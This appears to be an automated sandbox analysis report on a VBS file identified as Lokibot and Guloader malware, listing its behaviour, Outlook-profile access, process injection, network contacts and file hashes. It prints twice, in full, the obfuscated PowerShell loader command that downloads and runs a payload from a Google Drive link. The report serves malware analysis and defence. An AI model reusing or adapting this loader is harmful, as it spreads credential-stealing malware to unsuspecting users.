Analysis Overview
SHA256
43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612
Threat Level: Known bad
The file 43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs was found to be: Known bad.
Malicious Activity Summary
Lokibot
Guloader,Cloudeye
Blocklisted process makes network request
Checks computer location settings
Accesses Microsoft Outlook profiles
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Enumerates physical storage devices
Program crash
Suspicious use of AdjustPrivilegeToken
outlook_win_path
Suspicious behavior: EnumeratesProcesses
outlook_office_path
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-29 02:11
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-29 02:11
Reported
2024-03-29 02:14
Platform
win7-20240221-en
Max time kernel
156s
Max time network
152s
Command Line
Signatures
Guloader,Cloudeye
Lokibot
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1756 set thread context of 2488 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Mishitting unwrinkleable Energiindholds Funktionskommandoen Fidusmageriers Refreshfejl #>;$Duefalks=(cmd /c set /A 115^^0);Function Genanvendelsesprocessens ([String]$recriminatory){$Duefalks=[char][int]$Duefalks;$Rygsttte=$Duefalks+'ubstring';$Diskomusikken45=8;$Hamunds=Spiderweb($recriminatory);For($Duplikeringscentral=7; $Duplikeringscentral -lt $Hamunds; $Duplikeringscentral+=$Diskomusikken45){$Seapost=$recriminatory.$Rygsttte.Invoke($Duplikeringscentral, 1);$Orddelingsmulighed=$Orddelingsmulighed+$Seapost;}$Orddelingsmulighed;}function Alfridaric ($Lorenas){& ($Forsmdeligheder) ($Lorenas);}function Spiderweb ([String]$Misc50){$Bagstavnens=$Misc50.Length-1;$Bagstavnens;}$Byretternes248=Genanvendelsesprocessens 'DrawgloTL kfabrr Over.iaMilliarnbirderssAnalogifS.ydskaeFlourisrpibekonrCosiermiCan.idanFrist.rg Ba.jer ';$Skeetskydning=Genanvendelsesprocessens 'A.rdromhTrogonotVa,uumatFangstkpLucidnesDemo og:Korrela/Cathrin/LuftfardPosturarskolebeiMagistrvh.arnaaeAfbe,ed.OndartegDaadlsao Ken inocoendurgTryllekl Duplice Mewlin.Ressortc EquivaoCalefacmTransi,/ LittleuMonozy cR,brish?BeroendecisternxAthelinpOversimoRott.nsrMilie.atViolone=GennemsdTubulidoToxodonwAl.opatnLivsforlIndhaleogradv sa CossnedErnring&UncausaiSolbadsdFranssm= Equiba1G,urmanaChurri,GDolkest3 FormidYBartholp S.alke1UrskoveFFerreir1UnseverBac,pensrStern.drDysonstxei.olag6hermene3 Reprsev Snedk,yCransie_NullipedCute.sp9 AfplukHSmaalotVFourteeRRecontrF MorgenpStonema9Formueg6ForudrejVa.utap6TytonidY FyrresyMrkatenO BlystboKo.omip ';$Forsmdeligheder=Genanvendelsesprocessens ' kao.iniK artaleAvlsk,exsquilge ';$Nontarnishing=Genanvendelsesprocessens 'Scenit.$ForfaldgTeheetrlBulbideoSkrdd rb FeltbeaAsthma.l Bogtil: S stemFL.ckfuliPissescrS veflysImportutMiskredeTartarlm NeodadmbnkhammiPriseligBareboaeTrvetris ananas Cosignv=Negrita AmintorS DiaboltSoullikaMahmoudrGyldenbt Cottag-PetitjoBUdmatniiCohenimtSystemesFam,liaTNulpunkrAntist.aBedmmernCurs rfsStr tegf BrontoeKastorlr .ongae Isacsmo-Kewi omSPupalmyoUncongru guignor,arlatac ComplaeUdkigsm Preclea$MastigoS,urrogakRich,rteblankeeeBaalfrdthist,gesSkruehokb aceroyGrublesdS.ltananSmithieiTirana,nDemi.olgAl erne Jor.vrd-WordmonDStruktueEnpia os ngliktAvn.nbeiUku.lignHamburgaIlialattMind.kei U condo lassisnSponsib .urmoil$BrndeknPGedeostoShanghadKa,tisma Bacillr Trillug.inroweiMozingmdKrameria BenzoxeResolub ';Alfridaric (Genanvendelsesprocessens 'Vuggest$ hjl.elgAlman el .odetiopressesbFit,roya velprolKi.djal:Ter,binPEv,lueroSyltegldCessnanaqui decrstrengtgS nsoreiUncrushd Bygde,aBesveg.eRimbase= Butter$SuppuraeOscillanHensigtvL.rekla: Lynassa DorylipStarttipAutistid DirectaFaa.andtAgainwaaP,octos ') ;Alfridaric (Genanvendelsesprocessens 'urbinatITopissimFdeklinp guanodo Hee.esr Un.xpetCarbone- Pr.mavMAfstignoSidsenudPraelecubotundelSubnutre Organo ChestcoBAeroplai ReparttIsolatisKassablTBlomsterSvabretaSekretsnKortskasAlg,genf SamordeE tusiarMomzerp ') ;$Podargidae=$Podargidae+'\Frosts.sig' ;Alfridaric (Genanvendelsesprocessens 'Sn,rkle$Contrafg anlgsglFo udskoRremas.bKontradaStrouthlTethyst: I orgaLPe agogoDive,gewOverma.e Civilrr Cryb bibrugeranPerspekgLesedpr= Eupadm(Frotte.TThymeeve.ntipsys AccosttFrdigef- und.rcPBioetikabryst utrrfabrihOpsnuse Prevail$UnapparPEnzymetoAuningsdindstila He.oalrMonacidgPalatali.posercdBrugtesaRemed,teExisti.)Micropr ') ;while (-not $Lowering) {Alfridaric (Genanvendelsesprocessens ',lliticIBiogr.ffOmk,stn Intra,(expande$Be,trowFTroubleirystelsrBeskyttsMocmaintVrimlete atriarmHoodw.nm UsneamiFo lngegSolisteeCrispatsOrigina. ryptogJ pol vio.eavelybItho iiS InsolethornhinaBromofotSp kedaeAmaryll Phoenic-Sv vlile YnglinqKondens Turnech$Trendi B pastedySilverer Di inye .ctopotCo,sumetAfspil,e ,drmmerAnisaldnHayb teeStenedesGanoma,2 Apotra4sensefu8Blommes) Rackma Knaste.{GambierSA tsfortBredsaaaHype inrQuadrattPaaskel-ProrateSTakkefelBilulykeProstomeDingoerp ,iggar Unvanta1Psychop}HeroicaeKollapslDeairsssBindemieLarynxe{LnkontoSLommetotPausemeaIndkomsr ignomitnoncomp-,insnarS Ha.vhjlKosysteeDimensiean syrep ,apote Stymper1Undocto;SnakeflACalycinlLogp.rcfTraadner SvageliT gneendTetrapoaF,nansirExp undi NonanicRikoc e Sarasd$EjendomNRbretnio Y.rwhinMerthiotStrgbutaTheophirOozierbnBorog vi,arasitsUvi,kaahWhitis,iforsik.nPlanarigBasella}Yndetel ');Alfridaric (Genanvendelsesprocessens ' Fremsk$SolennegOver,eel PolliwoKo.legibHushcloaSaettemlSponsor:CatheteLHistorioIntercrwPolygone Ostr.crFornje iUlcusdenMegawatgCurforb=Buttonc(Whit.biTtavleskeKommercsPremud.t Titrer-PalladiP AerligaOrdnerntChoristh Regra, A renes$S,ovlplP Wa.erpo Afsk edBund maa BlrervrHjerneagphratriiU snobbdAmmoni,aDolklipeBetving)Sweenys ') ;}Alfridaric (Genanvendelsesprocessens 'I,filtr$CuniculgE.termilUnimbanodosmerebNoncohaaVaude.ilSo,dayf:KoldsveT Gastr.uactino nAerobiogicccadvh HypoamrEsse.eniUd.amrig,vibelghTrioboleDromedadsi natueFinge.sn phos hsDeconta Kodesk=P,ntill RetrostGP rametephosphat Fideju-MngdebeCStenfisoTilsid.nH.gemontAppetiseselvrosnKonebyttAppetiz autarki$Cor,deePLi.refooLaborerd BiltraaGaapa mrRgerierg A.skali.atalied Avn.gea vocatiePhanto ');Alfridaric (Genanvendelsesprocessens 'Istanbu$ Mos uig.uodesflMedullioTinw,reb,rneblaaTanzan l mortif:,ydisolGTyrann,uVict,aldNo dames LandskjUngree aSnavsvam ReproamAllianceS,rngemr vestial Omegnsi L.isteg Inddrie Jum surCognacsePondero Opionsm=Maaneds H,stopa[ Dul,imSSunfishy AttraasMawbountOuttea,eMortensm Suprav.OverhumCHyenineoMilieubn b nelevK,dnappeamphigar AntikltSkotren] Recapi:Oratric:SnoolsuFStyledrrha dlefocla.ichmM.srealBsternebaBleganss Rekvise Cornma6Pu,ridh4ThumbedSSpidsent S.irebr KunstaiRhizocanT.nfoldgOutwinb(Co.simi$ sportsTLabdanuuUnregennSo ostegTr.kkenhSvans arCensureiHeimorcgPre edehUnone,oeBoreensdUnsalareopsigernSidestisUnamend) enants ');Alfridaric (Genanvendelsesprocessens 'vineyar$MeatoscgDisorielMacrospoCr.wbarb Strafba.avortelRoe,ree:systemaSOverskrtde,alityBluebusrEx enseeOrielhvk ordkrioKolonisrFlayflitBurrknoeDividenn Lselame M.ning Stvkon=Superga Parabol[CommonaS VaabenyGe,aniesJablonstLnkontoe.sskabem Colpor.Discli.TAllitteeAnstdelx Boile.t Enz me.Reg,ormECiselernBryststcComp,omo Parasid.lagetsiTaxa.lyn Depl,mgCyphell]Indlgsb:trophyw:ParasolASaetninSWolfsprCData,orIPredefeIAtionsv.AnatropGSunkl.neCayleystFerraraS.pildnetFusi.lyrEjendetiweedlesn Nons,mgRaderer( Housew$ Nonam,GBeva,rou ffhandd.elsstrsVladbj,jMakvr,saS.lkwormForga.gmSprensaeVerju crJoaninalTillrt iUnca ceg PappoueHypercorGeropigeSpritkr).aplont ');Alfridaric (Genanvendelsesprocessens 'Frysesk$LaudanugReburyilPresecuoPana hebScarolaaCif erllJaevnli:Syn.ectMLokumscaOversetrefterslgFokuseriUdvi.linDuennasaNavigatlPad acyiRevengesBoulezkeTilbagerCurvateePr dukttBenzoph=Lituusc$Unho.tiS RestautRegnskayAff.ktirEfterkoeNucleopkRekviemo ro gerrFl.ggintSplejsveOpfriskn SkppedeCimolit. Liges,sVi ediruKlampenb RibonusDuodynatDamb ugr Fond bigennembnBre baagBnne.ta(Grun va3Ffeun i0haandka8Diapaus1Ny urde9De iner7 tilfil,Leucoto3Lopside1Udgan.s9M rgrie2Spklage9smaagri)Matr.li ');Alfridaric $Marginaliseret;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Mishitting unwrinkleable Energiindholds Funktionskommandoen Fidusmageriers Refreshfejl #>;$Duefalks=(cmd /c set /A 115^^0);Function Genanvendelsesprocessens ([String]$recriminatory){$Duefalks=[char][int]$Duefalks;$Rygsttte=$Duefalks+'ubstring';$Diskomusikken45=8;$Hamunds=Spiderweb($recriminatory);For($Duplikeringscentral=7; $Duplikeringscentral -lt $Hamunds; $Duplikeringscentral+=$Diskomusikken45){$Seapost=$recriminatory.$Rygsttte.Invoke($Duplikeringscentral, 1);$Orddelingsmulighed=$Orddelingsmulighed+$Seapost;}$Orddelingsmulighed;}function Alfridaric ($Lorenas){& ($Forsmdeligheder) ($Lorenas);}function Spiderweb ([String]$Misc50){$Bagstavnens=$Misc50.Length-1;$Bagstavnens;}$Byretternes248=Genanvendelsesprocessens 'DrawgloTL kfabrr Over.iaMilliarnbirderssAnalogifS.ydskaeFlourisrpibekonrCosiermiCan.idanFrist.rg Ba.jer ';$Skeetskydning=Genanvendelsesprocessens 'A.rdromhTrogonotVa,uumatFangstkpLucidnesDemo og:Korrela/Cathrin/LuftfardPosturarskolebeiMagistrvh.arnaaeAfbe,ed.OndartegDaadlsao Ken inocoendurgTryllekl Duplice Mewlin.Ressortc EquivaoCalefacmTransi,/ LittleuMonozy cR,brish?BeroendecisternxAthelinpOversimoRott.nsrMilie.atViolone=GennemsdTubulidoToxodonwAl.opatnLivsforlIndhaleogradv sa CossnedErnring&UncausaiSolbadsdFranssm= Equiba1G,urmanaChurri,GDolkest3 FormidYBartholp S.alke1UrskoveFFerreir1UnseverBac,pensrStern.drDysonstxei.olag6hermene3 Reprsev Snedk,yCransie_NullipedCute.sp9 AfplukHSmaalotVFourteeRRecontrF MorgenpStonema9Formueg6ForudrejVa.utap6TytonidY FyrresyMrkatenO BlystboKo.omip ';$Forsmdeligheder=Genanvendelsesprocessens ' kao.iniK artaleAvlsk,exsquilge ';$Nontarnishing=Genanvendelsesprocessens 'Scenit.$ForfaldgTeheetrlBulbideoSkrdd rb FeltbeaAsthma.l Bogtil: S stemFL.ckfuliPissescrS veflysImportutMiskredeTartarlm NeodadmbnkhammiPriseligBareboaeTrvetris ananas Cosignv=Negrita AmintorS DiaboltSoullikaMahmoudrGyldenbt Cottag-PetitjoBUdmatniiCohenimtSystemesFam,liaTNulpunkrAntist.aBedmmernCurs rfsStr tegf BrontoeKastorlr .ongae Isacsmo-Kewi omSPupalmyoUncongru guignor,arlatac ComplaeUdkigsm Preclea$MastigoS,urrogakRich,rteblankeeeBaalfrdthist,gesSkruehokb aceroyGrublesdS.ltananSmithieiTirana,nDemi.olgAl erne Jor.vrd-WordmonDStruktueEnpia os ngliktAvn.nbeiUku.lignHamburgaIlialattMind.kei U condo lassisnSponsib .urmoil$BrndeknPGedeostoShanghadKa,tisma Bacillr Trillug.inroweiMozingmdKrameria BenzoxeResolub ';Alfridaric (Genanvendelsesprocessens 'Vuggest$ hjl.elgAlman el .odetiopressesbFit,roya velprolKi.djal:Ter,binPEv,lueroSyltegldCessnanaqui decrstrengtgS nsoreiUncrushd Bygde,aBesveg.eRimbase= Butter$SuppuraeOscillanHensigtvL.rekla: Lynassa DorylipStarttipAutistid DirectaFaa.andtAgainwaaP,octos ') ;Alfridaric (Genanvendelsesprocessens 'urbinatITopissimFdeklinp guanodo Hee.esr Un.xpetCarbone- Pr.mavMAfstignoSidsenudPraelecubotundelSubnutre Organo ChestcoBAeroplai ReparttIsolatisKassablTBlomsterSvabretaSekretsnKortskasAlg,genf SamordeE tusiarMomzerp ') ;$Podargidae=$Podargidae+'\Frosts.sig' ;Alfridaric (Genanvendelsesprocessens 'Sn,rkle$Contrafg anlgsglFo udskoRremas.bKontradaStrouthlTethyst: I orgaLPe agogoDive,gewOverma.e Civilrr Cryb bibrugeranPerspekgLesedpr= Eupadm(Frotte.TThymeeve.ntipsys AccosttFrdigef- und.rcPBioetikabryst utrrfabrihOpsnuse Prevail$UnapparPEnzymetoAuningsdindstila He.oalrMonacidgPalatali.posercdBrugtesaRemed,teExisti.)Micropr ') ;while (-not $Lowering) {Alfridaric (Genanvendelsesprocessens ',lliticIBiogr.ffOmk,stn Intra,(expande$Be,trowFTroubleirystelsrBeskyttsMocmaintVrimlete atriarmHoodw.nm UsneamiFo lngegSolisteeCrispatsOrigina. ryptogJ pol vio.eavelybItho iiS InsolethornhinaBromofotSp kedaeAmaryll Phoenic-Sv vlile YnglinqKondens Turnech$Trendi B pastedySilverer Di inye .ctopotCo,sumetAfspil,e ,drmmerAnisaldnHayb teeStenedesGanoma,2 Apotra4sensefu8Blommes) Rackma Knaste.{GambierSA tsfortBredsaaaHype inrQuadrattPaaskel-ProrateSTakkefelBilulykeProstomeDingoerp ,iggar Unvanta1Psychop}HeroicaeKollapslDeairsssBindemieLarynxe{LnkontoSLommetotPausemeaIndkomsr ignomitnoncomp-,insnarS Ha.vhjlKosysteeDimensiean syrep ,apote Stymper1Undocto;SnakeflACalycinlLogp.rcfTraadner SvageliT gneendTetrapoaF,nansirExp undi NonanicRikoc e Sarasd$EjendomNRbretnio Y.rwhinMerthiotStrgbutaTheophirOozierbnBorog vi,arasitsUvi,kaahWhitis,iforsik.nPlanarigBasella}Yndetel ');Alfridaric (Genanvendelsesprocessens ' Fremsk$SolennegOver,eel PolliwoKo.legibHushcloaSaettemlSponsor:CatheteLHistorioIntercrwPolygone Ostr.crFornje iUlcusdenMegawatgCurforb=Buttonc(Whit.biTtavleskeKommercsPremud.t Titrer-PalladiP AerligaOrdnerntChoristh Regra, A renes$S,ovlplP Wa.erpo Afsk edBund maa BlrervrHjerneagphratriiU snobbdAmmoni,aDolklipeBetving)Sweenys ') ;}Alfridaric (Genanvendelsesprocessens 'I,filtr$CuniculgE.termilUnimbanodosmerebNoncohaaVaude.ilSo,dayf:KoldsveT Gastr.uactino nAerobiogicccadvh HypoamrEsse.eniUd.amrig,vibelghTrioboleDromedadsi natueFinge.sn phos hsDeconta Kodesk=P,ntill RetrostGP rametephosphat Fideju-MngdebeCStenfisoTilsid.nH.gemontAppetiseselvrosnKonebyttAppetiz autarki$Cor,deePLi.refooLaborerd BiltraaGaapa mrRgerierg A.skali.atalied Avn.gea vocatiePhanto ');Alfridaric (Genanvendelsesprocessens 'Istanbu$ Mos uig.uodesflMedullioTinw,reb,rneblaaTanzan l mortif:,ydisolGTyrann,uVict,aldNo dames LandskjUngree aSnavsvam ReproamAllianceS,rngemr vestial Omegnsi L.isteg Inddrie Jum surCognacsePondero Opionsm=Maaneds H,stopa[ Dul,imSSunfishy AttraasMawbountOuttea,eMortensm Suprav.OverhumCHyenineoMilieubn b nelevK,dnappeamphigar AntikltSkotren] Recapi:Oratric:SnoolsuFStyledrrha dlefocla.ichmM.srealBsternebaBleganss Rekvise Cornma6Pu,ridh4ThumbedSSpidsent S.irebr KunstaiRhizocanT.nfoldgOutwinb(Co.simi$ sportsTLabdanuuUnregennSo ostegTr.kkenhSvans arCensureiHeimorcgPre edehUnone,oeBoreensdUnsalareopsigernSidestisUnamend) enants ');Alfridaric (Genanvendelsesprocessens 'vineyar$MeatoscgDisorielMacrospoCr.wbarb Strafba.avortelRoe,ree:systemaSOverskrtde,alityBluebusrEx enseeOrielhvk ordkrioKolonisrFlayflitBurrknoeDividenn Lselame M.ning Stvkon=Superga Parabol[CommonaS VaabenyGe,aniesJablonstLnkontoe.sskabem Colpor.Discli.TAllitteeAnstdelx Boile.t Enz me.Reg,ormECiselernBryststcComp,omo Parasid.lagetsiTaxa.lyn Depl,mgCyphell]Indlgsb:trophyw:ParasolASaetninSWolfsprCData,orIPredefeIAtionsv.AnatropGSunkl.neCayleystFerraraS.pildnetFusi.lyrEjendetiweedlesn Nons,mgRaderer( Housew$ Nonam,GBeva,rou ffhandd.elsstrsVladbj,jMakvr,saS.lkwormForga.gmSprensaeVerju crJoaninalTillrt iUnca ceg PappoueHypercorGeropigeSpritkr).aplont ');Alfridaric (Genanvendelsesprocessens 'Frysesk$LaudanugReburyilPresecuoPana hebScarolaaCif erllJaevnli:Syn.ectMLokumscaOversetrefterslgFokuseriUdvi.linDuennasaNavigatlPad acyiRevengesBoulezkeTilbagerCurvateePr dukttBenzoph=Lituusc$Unho.tiS RestautRegnskayAff.ktirEfterkoeNucleopkRekviemo ro gerrFl.ggintSplejsveOpfriskn SkppedeCimolit. Liges,sVi ediruKlampenb RibonusDuodynatDamb ugr Fond bigennembnBre baagBnne.ta(Grun va3Ffeun i0haandka8Diapaus1Ny urde9De iner7 tilfil,Leucoto3Lopside1Udgan.s9M rgrie2Spklage9smaagri)Matr.li ');Alfridaric $Marginaliseret;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 172.217.16.225:443 | drive.usercontent.google.com | tcp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 172.217.16.225:443 | drive.usercontent.google.com | tcp |
| US | 140.82.61.49:80 | 140.82.61.49 | tcp |
| US | 140.82.61.49:80 | 140.82.61.49 | tcp |
| US | 140.82.61.49:80 | 140.82.61.49 | tcp |
| US | 140.82.61.49:80 | 140.82.61.49 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Preeducated.txt
| MD5 | c182cc2051a1f2cb0f78364db81b9fc1 |
| SHA1 | afef4d6a4f66aa307df4ed1179256d4667444585 |
| SHA256 | 5e29ffa5f6109f87e5d4205a591bbc8fcb529e3643462f6487b5479eb46d79be |
| SHA512 | 40b2d28acdfa3eda9997c385a67e86c0a120e1a12cc3c51ff2d649c262f458089be88c63ac042b43fed19386e6664bba6a632db67357f71f53c4719f30b37eac |
C:\Users\Admin\AppData\Local\Temp\Preeducated.txt
| MD5 | 8554355ff9009da1b1c8536a9bb2e2fd |
| SHA1 | 539aef5de341d53a43fa26a2d5e6ddd7f82a508d |
| SHA256 | aa4e604ec667d549b72c32b33e76269b0cdabc5c747b67889e7bfad238760d39 |
| SHA512 | 256472a8fa9f1381fedf8ed14858786f63ed4fa176eb5940abf5d90dc2547356458a9cbf5ec39de949e7a79c698fe91c708ebd8114d759d310c9f308e44bdb94 |
C:\Users\Admin\AppData\Local\Temp\Preeducated.txt
| MD5 | e55e9d1ae5fe8f525a35539ef7cb8a26 |
| SHA1 | eae2cc90fe2fff8c8391a4ba827aa06064c729bc |
| SHA256 | 4a45982b8c4124238f30262f24e37fd9dd3461728376854a3b7efb0fadc7c585 |
| SHA512 | bfebd15265f78a76f237c2bd695b813f0580cece1a53ca61291011c1edfa8845e2e436ea609b3cfb4be94001106ec8373438dc8483656ba33209db29c815cf89 |
C:\Users\Admin\AppData\Local\Temp\Preeducated.txt
| MD5 | 41077e923293898955e78267b7878339 |
| SHA1 | 36083128a00b83103bfe8bc36b0042ff6a703012 |
| SHA256 | 4d9b1845d8c7b9f85c23bf670d2df4757bfdd59ac5ccebee2df7cbb3b26292f0 |
| SHA512 | 070c9f8fc7fb22dda57f57c950250b4476f4790c91b0e26616db50a053a4b385b302f30d19a82475252e21942532925d64e9216938f37d751af2e2af31f7c922 |
memory/1388-298-0x000000001B290000-0x000000001B572000-memory.dmp
memory/1388-300-0x0000000002420000-0x0000000002428000-memory.dmp
memory/1388-299-0x000007FEF54C0000-0x000007FEF5E5D000-memory.dmp
memory/1388-301-0x0000000002450000-0x00000000024D0000-memory.dmp
memory/1388-302-0x0000000002450000-0x00000000024D0000-memory.dmp
memory/1388-303-0x0000000002450000-0x00000000024D0000-memory.dmp
memory/1388-304-0x000007FEF54C0000-0x000007FEF5E5D000-memory.dmp
memory/1388-305-0x0000000002450000-0x00000000024D0000-memory.dmp
memory/1388-306-0x00000000029A0000-0x00000000029C2000-memory.dmp
memory/1388-307-0x0000000002840000-0x0000000002852000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EM8DQYYW9H7S7EBS6TKR.temp
| MD5 | 1af72430a9d0a1b2bbd984d5e23e81aa |
| SHA1 | bf5d0480b4dc3bb98d8b439fe71af29058f4baf8 |
| SHA256 | 35df3e1bc498ec96e4c32c1185b5fa898b27336db00fe71d26f118cff3ed0ce3 |
| SHA512 | 65904ba5927e73ee66ba5545ef3d74605e343838883a89402f594246ecb1ccc2e38cab39279eacf0751b440d5b4ae6779cb0e9ff25db959d12eae571f1fe3e06 |
memory/1756-310-0x0000000073080000-0x000000007362B000-memory.dmp
memory/1756-311-0x0000000002640000-0x0000000002680000-memory.dmp
memory/1756-312-0x0000000073080000-0x000000007362B000-memory.dmp
memory/1388-313-0x000007FEF54C0000-0x000007FEF5E5D000-memory.dmp
memory/1756-314-0x0000000002640000-0x0000000002680000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabBDD3.tmp
| MD5 | 29f65ba8e88c063813cc50a4ea544e93 |
| SHA1 | 05a7040d5c127e68c25d81cc51271ffb8bef3568 |
| SHA256 | 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184 |
| SHA512 | e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0250596cd7064b5a57b4367a7ca7af90 |
| SHA1 | 5e8c88112e62648215b76323353ceedeb0261ce6 |
| SHA256 | ef0b6ea2ee2c0cc0a4d9335e5c07599f8aa12adf6473a6a768937463652fcea3 |
| SHA512 | d3c1afad19c1a08d15628bd762bbec9e9c2c32a6c7fac3247f6052314199194616234eee928740e233bfb78a8c0a41bdea34987525216690d44f6062a5e42763 |
memory/1388-326-0x0000000002450000-0x00000000024D0000-memory.dmp
memory/1388-327-0x0000000002450000-0x00000000024D0000-memory.dmp
memory/1388-328-0x0000000002450000-0x00000000024D0000-memory.dmp
memory/1388-329-0x0000000002450000-0x00000000024D0000-memory.dmp
memory/1756-330-0x0000000002640000-0x0000000002680000-memory.dmp
memory/1756-331-0x0000000005ED0000-0x0000000005FD0000-memory.dmp
memory/1756-332-0x00000000050D0000-0x00000000050D1000-memory.dmp
memory/1756-333-0x0000000006530000-0x000000000B2A6000-memory.dmp
memory/1756-334-0x0000000073080000-0x000000007362B000-memory.dmp
memory/1756-336-0x0000000002640000-0x0000000002680000-memory.dmp
memory/1756-337-0x0000000077040000-0x00000000771E9000-memory.dmp
memory/1756-339-0x0000000005ED0000-0x0000000005FD0000-memory.dmp
memory/1756-340-0x0000000077230000-0x0000000077306000-memory.dmp
memory/2488-341-0x0000000077040000-0x00000000771E9000-memory.dmp
memory/2488-342-0x0000000077230000-0x0000000077306000-memory.dmp
memory/2488-343-0x0000000077266000-0x0000000077267000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Tar7B49.tmp
| MD5 | 435a9ac180383f9fa094131b173a2f7b |
| SHA1 | 76944ea657a9db94f9a4bef38f88c46ed4166983 |
| SHA256 | 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34 |
| SHA512 | 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e9a2db3c218cd02fbd23c3ffdd7f9e02 |
| SHA1 | 8abc9172b0d4631ab0ab99988b25be4529e03644 |
| SHA256 | ec015b733fe5f63d3d928e1cd6148e257aa9ee047104c1d4804a82a0471ac76d |
| SHA512 | 5a59c89daeab23978422138d6b640c6d67ffc6b15078cd4ceeb8d1ba42445ab7a7a1ffcdc93ffdf202dfd45b470359d3d3d1dd73854bbdcdb9a95da520eea1a6 |
memory/2488-368-0x0000000000400000-0x0000000000581000-memory.dmp
